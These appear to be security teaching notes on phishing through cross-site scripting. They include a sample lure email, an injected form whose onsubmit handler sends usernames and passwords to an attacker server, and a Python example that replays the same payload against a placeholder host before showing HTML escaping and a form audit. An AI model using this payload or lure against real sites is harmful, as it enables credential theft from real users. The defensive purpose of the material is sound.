• Phishing using XSS steals victims' credentials and subsequently commits crimes using the stolen credentials.
  • Attack Vectors:
    • Staged site:
      • Use social engineering (e.g., email, message board, etc.) to trick a victim into clicking a link to a staged site that has an HTML form crafted to resemble the original form.
      • The crafted URL is usually camouflaged by encoding the malicious portion of the injected code or by shortening the entire URL.
      • Here is an example of the email sent to the victim:
        Dear Victim User, Due to an emergency server shutdown, we have been experiencing some user account issues. As a result, it is necessary that you log in to your account within the next 24 hours to validate your user membership, or else you risk having your membership terminated. Please proceed by following the link (the hacker's version of the login page) and log into your account. Thank you, and we apologize for the inconvenience.
      • After the victim sends the credentials, the attacker fools the victim by returning the following message:
        Dear Victim User, the system is under maintenance; please try again later. Thank you, and we apologize for the inconvenience.
    • Injected code:
      • Search for a victim site and examine its login page.
      • Create the injected code and a fake login page that looks similar, if not identical, to the victim site's. For example:
      • </form>
        <form action="login.aspx" method="post" onsubmit="XSSimage = new Image; XSSimage.src=attackerserver + document.forms(1).login.value + ':' + document.forms(1).password.value;">
      • The </form> tag provides a closing tag for the original form, allowing the attacker to add and manipulate his own. The onsubmit property is a set of JavaScript instructions executed when the user clicks the submit button, just before the actual form request is sent. So a new image called XSSimage is created when the user clicks the login button to submit the form, and a request containing the victim's login username and password is silently sent to the attacker's server.
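The flaw that makes the injected-code variant possible is a page that writes untrusted content into the HTML that contains the login form without encoding it. The following is an added example, not code from the original notes: a minimal login-page renderer in its vulnerable and hardened forms, plus a parser-based audit a defender can run on rendered pages. The page layout, the notice field used as the injection point, the host name attacker.invalid (a reserved placeholder) and the function names are all assumptions made for this example; the sample payload is constructed to match the shape of the injected code shown above.

```python
import html
from html.parser import HTMLParser

# Constructed sample payload of the kind described above: it closes the site's
# own <form> and opens an attacker-controlled one carrying an onsubmit handler.
# "attacker.invalid" is a reserved placeholder host, not a real server.
INJECTED = (
    '</form><form action="login.aspx" method="post" '
    "onsubmit=\"XSSimage = new Image; XSSimage.src='https://attacker.invalid/' "
    "+ document.forms(1).login.value + ':' + document.forms(1).password.value;\">"
)


def _login_form(notice_html: str) -> str:
    """Login page skeleton (assumed layout); notice_html is placed inside the form verbatim."""
    return (
        '<form action="/login" method="post">'
        f'<p class="notice">{notice_html}</p>'
        '<input name="login">'
        '<input name="password" type="password">'
        '<input type="submit" value="Log in">'
        "</form>"
    )


def render_login_vulnerable(notice: str) -> str:
    """Reflects the untrusted notice into the page unencoded: the XSS flaw."""
    return _login_form(notice)


def render_login_hardened(notice: str) -> str:
    """Same page, but the untrusted value is HTML-escaped first. quote=True also
    encodes quote characters, so the value cannot break out of an attribute either."""
    return _login_form(html.escape(notice, quote=True))


class FormAudit(HTMLParser):
    """Counts <form> elements and inline on* attributes as a real HTML parser
    sees them, so escaped text (&lt;form&gt;) is not mistaken for markup."""

    def __init__(self) -> None:
        super().__init__()
        self.form_count = 0
        self.inline_handlers = []  # (tag, attribute-name) pairs

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.form_count += 1
        for name, _value in attrs:
            if name.startswith("on"):
                self.inline_handlers.append((tag, name))


def audit_page(page_html: str) -> dict:
    """Defender's check for a login page: exactly one form and no inline event
    handlers. Usable as a unit test on rendered templates or in a scanning proxy."""
    parser = FormAudit()
    parser.feed(page_html)
    parser.close()
    return {
        "form_count": parser.form_count,
        "inline_handlers": parser.inline_handlers,
        "clean": parser.form_count == 1 and not parser.inline_handlers,
    }


if __name__ == "__main__":
    for label, render in (("vulnerable", render_login_vulnerable),
                          ("hardened", render_login_hardened)):
        print(label, audit_page(render(INJECTED)))
```

Run as a script, the vulnerable rendering reports two forms and an onsubmit handler on the second one, while the hardened rendering reports a single form and no handlers because the payload survives only as escaped text. Output encoding is the primary fix; as defence in depth, a Content-Security-Policy whose script-src omits 'unsafe-inline' prevents inline on* handlers from running at all, and its form-action and img-src directives limit where a form may submit and where an Image beacon may load.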